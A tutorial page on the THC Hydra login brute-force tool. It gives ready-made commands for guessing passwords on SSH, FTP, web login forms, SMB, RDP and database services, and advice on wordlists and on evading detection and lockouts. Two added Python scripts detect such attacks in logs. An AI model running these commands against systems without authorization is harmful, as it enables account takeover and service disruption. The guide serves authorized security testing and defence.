
THC Hydra: Network Login Brute Force Guide

THC Hydra is one of the most widely used network login brute force tools in security testing. It supports over 50 protocols and services, making it indispensable for penetration testers and security auditors who need to evaluate authentication strength across network infrastructure.

20 min read | Last updated: February 20, 2026

Dai Aoki
CEO at init, Inc. / CTO at US & JP startups / Creator of WebTerm

Ethical and Legal Disclaimer
THC Hydra is a powerful brute force tool intended exclusively for authorized security testing and educational purposes. Using this tool against systems without explicit written permission is illegal in most jurisdictions and may violate laws such as the Computer Fraud and Abuse Act (CFAA), the UK Computer Misuse Act, and similar legislation worldwide. Always obtain proper authorization before testing any system. The authors of this guide are not responsible for any misuse of this tool.

Quick Reference

Basic Attacks

| Command | Purpose |
| --- | --- |
| `hydra -l user -P pass.txt ssh://target` | SSH brute force |
| `hydra -l user -P pass.txt ftp://target` | FTP brute force |
| `hydra -L users.txt -P pass.txt target ssh` | Multiple users |

HTTP Attacks

| Command | Purpose |
| --- | --- |
| `hydra -l admin -P pass.txt target http-get /path` | HTTP GET auth |
| `hydra -l admin -P pass.txt target http-post-form "..."` | HTTP POST form |
| `hydra -l admin -P pass.txt target https-get /path` | HTTPS GET auth |

Options

| Option | Effect |
| --- | --- |
| `-t 16` | Set 16 parallel tasks |
| `-s 2222` | Custom port number |
| `-o results.txt` | Output to file |

Session Control

| Option | Effect |
| --- | --- |
| `-R` | Restore previous session |
| `-e nsr` | Try null/same/reverse passwords |
| `-V` | Show each login attempt |

Database Attacks

| Command | Purpose |
| --- | --- |
| `hydra -l root -P pass.txt target mysql` | MySQL brute force |
| `hydra -l postgres -P pass.txt target postgres` | PostgreSQL brute force |
| `hydra -l sa -P pass.txt target mssql` | MSSQL brute force |


Overview

THC Hydra (commonly referred to as just "Hydra") is an open-source, parallelized login cracker developed by The Hacker's Choice (THC). It performs rapid dictionary attacks and brute force attacks against remote authentication services. Hydra is designed to be fast, flexible, and easy to extend with new modules.

Hydra supports a wide range of protocols including SSH, FTP, HTTP, HTTPS, SMB, LDAP, MySQL, PostgreSQL, MSSQL, RDP, VNC, Telnet, SMTP, POP3, IMAP, and many more. Its parallelized architecture allows it to test multiple credentials simultaneously, significantly reducing the time needed for comprehensive authentication audits.

Key capabilities of THC Hydra include:

  • Support for over 50 protocols and services
  • Parallelized connections for high-speed testing
  • Flexible input via user/password lists or single credentials
  • Session restore functionality for interrupted attacks
  • IPv6 support for modern network environments
  • Modular design allowing easy protocol additions
  • HTTP/HTTPS form-based authentication attacks
  • Proxy and SOCKS support for network routing

Installation

THC Hydra is available through most Linux package managers and can also be compiled from source for the latest features and protocol support.

Install on Debian/Ubuntu

```bash
# Install from official repositories
sudo apt update
sudo apt install hydra

# Verify installation
hydra -h
```

On Kali Linux and other penetration testing distributions, Hydra is typically pre-installed.

Install on macOS

```bash
# Install using Homebrew
brew install hydra

# Verify installation
hydra -h
```

Install from Source

Building from source gives you the latest version with all protocol modules. You will need development libraries for the protocols you wish to support.

```bash
# Install build dependencies (Debian/Ubuntu)
sudo apt install build-essential libssl-dev libssh-dev \
  libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev \
  libpq-dev libsvn-dev firebird-dev libmemcached-dev

# Clone the repository
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra

# Configure and build
./configure
make
sudo make install

# Verify installation
hydra -h
```

Tip
When building from source, the configure script will report which optional modules are available based on your installed libraries. Install the relevant development packages before running configure to enable all desired protocol modules.

Basic Usage

Command Syntax

Hydra follows a consistent command-line syntax for all supported protocols. The general format is:

```bash
hydra [options] target protocol

# Or using the URL-style syntax:
hydra [options] protocol://target[:port]
```

The most common options define the username(s) and password(s) to test:

```bash
# Single username, password list
hydra -l username -P /path/to/passwords.txt target protocol

# Username list, single password
hydra -L /path/to/users.txt -p password target protocol

# Both username and password lists
hydra -L /path/to/users.txt -P /path/to/passwords.txt target protocol
```

Single Target Attack

The simplest form of a Hydra attack targets a single host with a known username and a password list:

```bash
# Basic SSH brute force with verbose output
hydra -l admin -P /usr/share/wordlists/rockyou.txt -V 192.168.1.100 ssh

# FTP brute force on a custom port
hydra -l ftpuser -P passwords.txt -s 2121 192.168.1.100 ftp

# Using URL-style syntax
hydra -l admin -P passwords.txt ssh://192.168.1.100:22
```

Info
The -V flag enables verbose mode, showing each login attempt in real time. This is useful during testing to monitor progress, but it slows down the attack due to the additional output overhead.

Protocol-Specific Attacks

Hydra shines in its broad protocol support. Each protocol module is optimized for the specific authentication mechanism of the target service. Below are the most commonly used protocol attack examples.

SSH Brute Force

SSH is one of the most frequently tested services. Hydra handles both password and keyboard-interactive authentication methods.

```bash
# Basic SSH attack
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh

# SSH with custom port and threading
hydra -l admin -P passwords.txt -s 2222 -t 4 192.168.1.100 ssh

# SSH with multiple usernames and additional checks
hydra -L users.txt -P passwords.txt -e nsr 192.168.1.100 ssh

# Try null password (n), same as login (s), reversed login (r)
hydra -l admin -P passwords.txt -e nsr ssh://192.168.1.100
```

Tip
SSH servers often have rate limiting or fail2ban configured. Keep the thread count low (e.g., -t 4) to avoid triggering account lockouts or IP bans during authorized testing.

FTP Brute Force

```bash
# Basic FTP attack
hydra -l ftpuser -P passwords.txt 192.168.1.100 ftp

# FTP with anonymous login check
hydra -l anonymous -P passwords.txt 192.168.1.100 ftp

# FTP over TLS/SSL
hydra -l admin -P passwords.txt 192.168.1.100 ftps
```

HTTP Form Attack

HTTP form attacks are among the most powerful Hydra capabilities. They target web login pages by submitting POST or GET requests with credential parameters. You must identify the form fields and the failure/success condition.

```bash
# HTTP POST form attack
# Syntax: http-post-form "path:parameters:failure_string"
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid credentials"

# HTTPS POST form attack
hydra -l admin -P passwords.txt 192.168.1.100 https-post-form \
  "/login:username=^USER^&password=^PASS^:F=Login failed"

# HTTP POST form with cookie
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:username=^USER^&password=^PASS^:F=incorrect:H=Cookie: PHPSESSID=abc123"

# Success-based detection (S= instead of F=)
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login:user=^USER^&pass=^PASS^:S=Welcome"
```

In the form string, ^USER^ and ^PASS^ are placeholder tokens that Hydra replaces with the current username and password being tested. The F= prefix indicates a failure string (present on failed logins), while S= indicates a success string (present only on successful logins). The H= prefix allows you to add custom HTTP headers.

HTTP GET Basic Auth

For services protected by HTTP Basic or Digest authentication:

```bash
# HTTP Basic Authentication
hydra -l admin -P passwords.txt 192.168.1.100 http-get /admin/

# HTTPS Basic Authentication on custom port
hydra -l admin -P passwords.txt -s 8443 192.168.1.100 https-get /secure/

# HTTP Digest Authentication (auto-detected)
hydra -l admin -P passwords.txt 192.168.1.100 http-get /protected/
```

SMB Brute Force

```bash
# SMB/Windows authentication attack
hydra -l administrator -P passwords.txt 192.168.1.100 smb

# SMB with domain specification
hydra -l admin -P passwords.txt -m "WORKGROUP" 192.168.1.100 smb

# SMB version 2/3 (smb2 module, available when Hydra is built with libsmbclient)
hydra -l admin -P passwords.txt 192.168.1.100 smb2
```

RDP Brute Force

```bash
# RDP brute force (Remote Desktop Protocol)
hydra -l administrator -P passwords.txt 192.168.1.100 rdp

# RDP with domain
hydra -l admin -P passwords.txt -m "DOMAIN" 192.168.1.100 rdp

# RDP on custom port
hydra -l admin -P passwords.txt -s 3390 192.168.1.100 rdp
```

Warning
RDP brute force attacks are slow by nature due to the protocol handshake overhead. Windows also implements account lockout policies by default. Always check the lockout policy before running RDP attacks to avoid locking out user accounts during a test.

MySQL Brute Force

```bash
# MySQL authentication attack
hydra -l root -P passwords.txt 192.168.1.100 mysql

# MySQL on custom port
hydra -l dbadmin -P passwords.txt -s 3307 192.168.1.100 mysql

# MySQL with multiple usernames
hydra -L db_users.txt -P passwords.txt 192.168.1.100 mysql
```

PostgreSQL Brute Force

```bash
# PostgreSQL authentication attack
hydra -l postgres -P passwords.txt 192.168.1.100 postgres

# Specify a target database (module option)
hydra -l postgres -P passwords.txt 192.168.1.100 postgres -m "targetdb"

# PostgreSQL on custom port
hydra -l dbuser -P passwords.txt -s 5433 192.168.1.100 postgres
```

Advanced Options

Password Lists and Wordlists

The effectiveness of a brute force attack depends heavily on the quality of the wordlist. Hydra works with any plain text file containing one password per line. Several well-known wordlists are commonly used in security testing.

```bash
# Using the classic rockyou wordlist (Kali Linux)
hydra -l admin -P /usr/share/wordlists/rockyou.txt target ssh

# Generate a custom wordlist with crunch and pipe to Hydra
crunch 6 8 abcdefghijklmnopqrstuvwxyz0123456789 | hydra -l admin -P - target ssh

# Use a colon-separated file of user:password pairs
hydra -C /path/to/credentials.txt target ssh

# Generate passwords on the fly from a character set
# -x MIN:MAX:CHARSET
hydra -l admin -x 4:6:aA1 192.168.1.100 ssh
```

The -x option generates passwords dynamically instead of reading them from a file. The format is MIN:MAX:CHARSET, where MIN and MAX bound the password length and the charset specifiers are a for lowercase letters, A for uppercase letters and 1 for digits; any other character in the charset is taken literally, which is how special symbols are added.

Info
The -C option accepts a colon-separated file in username:password format. This is useful when you have pre-built credential pairs from data breach analysis or prior reconnaissance.

Threading and Performance

Hydra runs multiple parallel connections to speed up testing. The default is 16 tasks (threads), but this can be tuned based on the target service and network conditions.

```bash
# Set parallel tasks to 64
hydra -l admin -P passwords.txt -t 64 192.168.1.100 ftp

# Reduce threads for rate-limited services
hydra -l admin -P passwords.txt -t 4 192.168.1.100 ssh

# Set connection timeout (seconds)
hydra -l admin -P passwords.txt -w 10 192.168.1.100 ssh

# Set wait time between connections per thread (seconds)
hydra -l admin -P passwords.txt -W 3 192.168.1.100 ssh

# Combine a low task count with a per-thread wait to throttle the overall attempt rate
hydra -l admin -P passwords.txt -t 4 -W 2 192.168.1.100 ssh
```

Tip
For SSH and RDP, keep thread counts low (4-8) to avoid triggering intrusion detection systems. For FTP and HTTP services, you can safely increase threads to 32-64 for faster testing.

Restore and Session Management

Hydra automatically saves session state so interrupted attacks can be resumed. This is critical when running long attacks with large wordlists.

```bash
# Restore a previously interrupted session
hydra -R

# Session state is saved as hydra.restore in the current directory.
# The file is binary, so just confirm it exists before restoring.
ls -l hydra.restore

# Output results to a file
hydra -l admin -P passwords.txt -o results.txt 192.168.1.100 ssh

# Output in JSON format
hydra -l admin -P passwords.txt -o results.json -b json 192.168.1.100 ssh

# Stop after finding the first valid credential pair
hydra -l admin -P passwords.txt -f 192.168.1.100 ssh

# Stop after first pair found on ANY host (with -M target list)
hydra -L users.txt -P passwords.txt -F -M targets.txt ssh
```

Practical Examples

Testing SSH Authentication Strength

A comprehensive SSH authentication audit tests multiple accounts with well-known weak passwords. This example shows a typical authorized penetration test scenario.

```bash
# Create a targeted user list
cat > users.txt << 'EOF'
root
admin
administrator
ubuntu
deploy
git
jenkins
ansible
EOF

# Run SSH audit with safe settings
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt \
  -t 4 -e nsr -o ssh_results.txt -V 192.168.1.100 ssh

# The -e nsr flag also tests:
#   n = null/empty password
#   s = username as password
#   r = reversed username as password

# Review results
cat ssh_results.txt
```
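Seen from the defending side, a run like the one above leaves a very recognisable trace in sshd logs: a burst of failures from one source, spread across a list of usernames, several in the same second. The following added example (not part of the original guide) flags that pattern in auth.log lines; the log lines, IP addresses and usernames are constructed, and the 60-second window and six-failure threshold are assumed values.

```python
"""Flag Hydra-style SSH password guessing in sshd auth.log lines.
Added example (not from the guide); sample lines, IPs and names are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in classic syslog format (as in Debian/Ubuntu auth.log).
SAMPLE_LOG = """\
Feb 20 10:00:01 host sshd[1001]: Failed password for root from 192.0.2.10 port 50001 ssh2
Feb 20 10:00:01 host sshd[1002]: Failed password for invalid user deploy from 192.0.2.10 port 50002 ssh2
Feb 20 10:00:01 host sshd[1003]: Failed password for admin from 192.0.2.10 port 50003 ssh2
Feb 20 10:00:02 host sshd[1004]: Failed password for invalid user jenkins from 192.0.2.10 port 50004 ssh2
Feb 20 10:00:02 host sshd[1005]: Failed password for root from 192.0.2.10 port 50005 ssh2
Feb 20 10:00:03 host sshd[1006]: Failed password for admin from 192.0.2.10 port 50006 ssh2
Feb 20 10:00:03 host sshd[1007]: Failed password for invalid user ansible from 192.0.2.10 port 50007 ssh2
Feb 20 10:00:04 host sshd[1008]: Failed password for admin from 192.0.2.10 port 50008 ssh2
Feb 20 10:00:05 host sshd[1009]: Accepted password for admin from 192.0.2.10 port 50009 ssh2
Feb 20 10:30:00 host sshd[1100]: Failed password for alice from 198.51.100.7 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) "
    r"password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_events(text):
    """Yield (timestamp, ip, user, accepted) for every password auth line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog stamps carry no year; fine for relative windows
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"] == "Accepted"

def detect_bruteforce(text, window=60, threshold=6):
    """Return {ip: finding} for sources with >= threshold failures inside one window
    (seconds). A success from the same source after the burst is the part to triage first."""
    by_ip = defaultdict(list)
    for ev in parse_events(text):
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if not e[3]]
        peak, start = 0, 0  # densest run of failures inside one window
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        per_second = defaultdict(int)
        for e in fails:
            per_second[e[0]] += 1
        findings[ip] = {
            "failures": len(fails),
            "peak_in_window": peak,
            "distinct_users": len({e[2] for e in fails}),  # user-list spraying (-L)
            "max_per_second": max(per_second.values()),    # hints at parallel tasks (-t)
            "success_after_failures": sorted(e[2] for e in evs if e[3] and e[0] > fails[0][0]),
        }
    return findings

if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, f)
```

The single failure from the second source stays below the threshold, while the first source is reported with five distinct usernames, three attempts in one second and a subsequent accepted login for admin.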

Web Login Form Brute Force

Testing web application login forms requires inspecting the HTML to identify form fields, the submission endpoint, and the response that indicates a failed login. Use your browser's developer tools to gather this information.

```bash
# Step 1: Identify form parameters using curl or browser DevTools
# Look for: form action URL, input field names, failure message

# Step 2: Construct the Hydra command
# Example for a WordPress login page
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username"

# Example for a custom PHP login page
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
  "/login.php:username=^USER^&password=^PASS^:F=Login failed"

# Example with CSRF token handling (use Burp Suite or custom scripts for CSRF)
# Hydra does not natively handle CSRF tokens, so for forms with CSRF
# protection, consider pairing Hydra with tools like Burp Suite Intruder

# HTTPS form with custom header
hydra -l admin -P passwords.txt 192.168.1.100 https-post-form \
  "/api/login:user=^USER^&pass=^PASS^:F=unauthorized:H=Content-Type: application/x-www-form-urlencoded"
```

Info
To determine the correct failure string, attempt a manual login with invalid credentials and note the response message. Use a unique portion of that message as the failure condition after the F= prefix.
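From the web server's point of view, the same F= logic works in reverse: a form attack is a burst of POSTs to the login path that all draw the identical failure page, so the one response that differs is the one worth looking at. The following added example (not part of the original guide) flags that pattern in combined-format access log lines; the log lines, IPs, paths, sizes, the login endpoints and the five-per-minute threshold are constructed assumptions.

```python
"""Flag form-login password guessing in a web server access log.
Added example (not from the guide); sample lines, IPs, paths and sizes are constructed."""
import re
from collections import Counter, defaultdict
from datetime import datetime

LOGIN_PATHS = {"/login.php", "/wp-login.php"}  # assumed login endpoints

# Constructed nginx/Apache "combined" lines: one source posts the same failing login over
# and over (identical 200/1532 responses, the very uniformity an F= string relies on) and
# then gets a different answer; a second source logs in once, normally.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Feb/2026:10:05:01 +0000] "POST /login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [20/Feb/2026:10:05:01 +0000] "POST /login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [20/Feb/2026:10:05:02 +0000] "POST /login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [20/Feb/2026:10:05:02 +0000] "POST /login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [20/Feb/2026:10:05:03 +0000] "POST /login.php HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (Hydra)"
192.0.2.10 - - [20/Feb/2026:10:05:03 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0 (Hydra)"
203.0.113.5 - - [20/Feb/2026:10:06:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Feb/2026:10:06:05 +0000] "GET /dashboard HTTP/1.1" 200 4201 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)

def parse_login_posts(text):
    """Yield (minute_bucket, ip, status, size, user_agent) for POSTs to a login path."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].split("?")[0] not in LOGIN_PATHS:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        size = 0 if m["size"] == "-" else int(m["size"])
        yield ts.replace(second=0), m["ip"], m["status"], size, m["ua"]

def detect_form_bruteforce(text, threshold=5):
    """Return {ip: finding} for sources with >= threshold login POSTs in one minute bucket.
    Failed form logins usually return 200 with the same error page, so status codes alone
    do not separate failures from successes; the dominant (status, size) pair is taken as
    the failure profile and any other response from the same source is flagged for triage."""
    by_ip = defaultdict(list)
    for ev in parse_login_posts(text):
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        per_minute = Counter(e[0] for e in evs)
        if max(per_minute.values()) < threshold:
            continue
        profile = Counter((e[2], e[3]) for e in evs).most_common(1)[0][0]
        findings[ip] = {
            "posts": len(evs),
            "peak_per_minute": max(per_minute.values()),
            "failure_profile": profile,
            "possible_success": [e[2] for e in evs if (e[2], e[3]) != profile],
            "ua_names_tool": any("hydra" in e[4].lower() for e in evs),  # weak signal only
        }
    return findings

if __name__ == "__main__":
    for ip, f in detect_form_bruteforce(SAMPLE_LOG).items():
        print(ip, f)
```

A User-Agent that names a tool is reported only as a weak signal, since request headers are under the client's control; the volume and the response-profile outlier are what the alert should rest on.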

Network Service Audit

Auditing multiple services across a network requires scanning for open ports first, then systematically testing each discovered service with appropriate credentials.

```bash
# Step 1: Scan for open services with nmap (grepable output, one host per line)
nmap -sV -p 21,22,80,443,445,3306,3389,5432 192.168.1.0/24 -oG services.txt

# Step 2: Create a target list for Hydra
# Extract hosts with SSH open; the leading space keeps e.g. 2222/open from matching
grep " 22/open" services.txt | awk '{print $2}' > ssh_targets.txt

# Step 3: Run Hydra against multiple targets
hydra -L users.txt -P passwords.txt -M ssh_targets.txt -t 4 -o audit_results.txt ssh

# Step 4: Test FTP services on discovered hosts
grep " 21/open" services.txt | awk '{print $2}' > ftp_targets.txt
hydra -L users.txt -P passwords.txt -M ftp_targets.txt -t 8 -o ftp_results.txt ftp

# Step 5: Test MySQL services
grep " 3306/open" services.txt | awk '{print $2}' > mysql_targets.txt
hydra -l root -P passwords.txt -M mysql_targets.txt -t 4 -o mysql_results.txt mysql

# Compile all results
cat *_results.txt > full_audit_report.txt
```

Options Reference

The following table provides a comprehensive reference for the most important Hydra command-line options.

Hydra Options Reference

| Option | Description |
| --- | --- |
| `-l LOGIN` | Use a single login name |
| `-L FILE` | Load login names from a file |
| `-p PASS` | Use a single password |
| `-P FILE` | Load passwords from a file |
| `-C FILE` | Use colon-separated user:pass format file |
| `-x MIN:MAX:CHARSET` | Generate passwords (a=lower, A=upper, 1=digits) |
| `-e nsr` | Try null password (n), same as login (s), reversed (r) |
| `-t TASKS` | Number of parallel connections (default: 16) |
| `-s PORT` | Use custom port number |
| `-o FILE` | Write found credentials to file |
| `-b FORMAT` | Output format: text (default), json, jsonv1 |
| `-f` | Stop after first valid pair found on host |
| `-F` | Stop after first valid pair found on any host |
| `-M FILE` | Load target list from file (one per line) |
| `-w TIME` | Connection timeout in seconds (default: 32) |
| `-W TIME` | Wait time between connections per thread |
| `-V` | Verbose mode: show each login attempt |
| `-v` | Verbose mode: show additional info |
| `-d` | Debug mode: show full protocol details |
| `-R` | Restore a previously aborted session |
| `-S` | Use SSL for the connection |
| `-O` | Use old SSL v2/v3 (not TLS) |
| `-4` / `-6` | Force IPv4 or IPv6 addresses |
| `-m MODULE_OPT` | Pass module-specific options |
| `-U` | Show module usage details for a protocol |

To see module-specific help for any protocol, use:

```bash
# Show help for a specific module
hydra -U http-post-form
hydra -U ssh
hydra -U smb

# List all supported protocols
hydra -h | grep "Supported services"
```

Tips and Best Practices

Following best practices ensures that your brute force testing is effective, safe, and legally compliant. These guidelines apply to authorized penetration testing engagements.

  • Always have written authorization. Before running Hydra against any target, ensure you have a signed penetration testing agreement or scope document that explicitly permits brute force testing.
  • Start with low thread counts. Use -t 4 initially, especially for SSH and RDP. Increase gradually only if the target service can handle it without triggering lockouts.
  • Use targeted wordlists. Generic wordlists like rockyou.txt are a good starting point, but custom wordlists tailored to the target organization yield better results. Tools like CeWL can generate wordlists from website content.
  • Check account lockout policies. Before running attacks, verify the target's lockout thresholds. Accidentally locking out production accounts during a test can cause significant business disruption.
  • Use the -e nsr flag. This tests null passwords, username-as-password, and reversed username, which catches many common misconfigurations with minimal additional time.
  • Save results with -o. Always output results to a file for documentation. Use JSON format (-b json) for easier post-processing and reporting.
  • Use -f to stop early. In most penetration tests, finding one valid credential per service is sufficient to prove the vulnerability. The -f flag stops Hydra after the first successful login.
  • Combine with nmap for reconnaissance. Use nmap to identify open services before running Hydra. This avoids wasting time on closed ports and ensures you test all discovered services.
  • Monitor network impact. Brute force attacks generate significant traffic. Coordinate with the network team to ensure your testing does not impact production services or trigger false positives in monitoring systems.
  • Document everything. Record your commands, target scope, timing, and results. Thorough documentation is essential for professional penetration testing reports and legal compliance.
Danger
Never run Hydra against production systems during business hours without explicit coordination with the system owners. Brute force attacks can cause performance degradation, account lockouts, and alert fatigue for security operations teams.

THC Hydra is often used alongside other security tools for comprehensive penetration testing. Understanding when to use each tool helps you build an efficient testing workflow.

  • Hashcat / John the Ripper -- Offline password cracking tools. While Hydra attacks live network services, Hashcat and John work on captured password hashes. Use them when you have obtained password hash files from a compromised system.
  • Nmap -- Network scanner for reconnaissance. Run nmap first to discover open ports and services, then use Hydra to test the authentication strength of discovered services.
  • Medusa -- Another parallel login brute forcer similar to Hydra. Medusa uses a modular design with a slightly different syntax. It can be used as an alternative when Hydra has issues with specific protocols.
  • Ncrack -- Developed by the Nmap project, Ncrack is designed for high-speed network authentication cracking. It supports fewer protocols than Hydra but offers deep integration with Nmap output formats.
  • Burp Suite -- For web application testing, Burp Suite's Intruder module handles complex scenarios that Hydra cannot, such as CSRF token handling, multi-step authentication, and session-based attacks.
  • Metasploit Framework -- Includes brute force modules (e.g., auxiliary/scanner/ssh/ssh_login) that integrate with the broader exploitation workflow. Use Metasploit when you need to chain authentication attacks with post-exploitation activities.
  • CeWL -- Custom word list generator that crawls a target website and builds a wordlist from the site content. Pair CeWL-generated wordlists with Hydra for targeted brute force attacks specific to the organization.

Official Documentation

For authoritative information, refer to the official documentation in the THC Hydra repository on GitHub (https://github.com/vanhauser-thc/thc-hydra) and to the built-in module help (hydra -U protocol).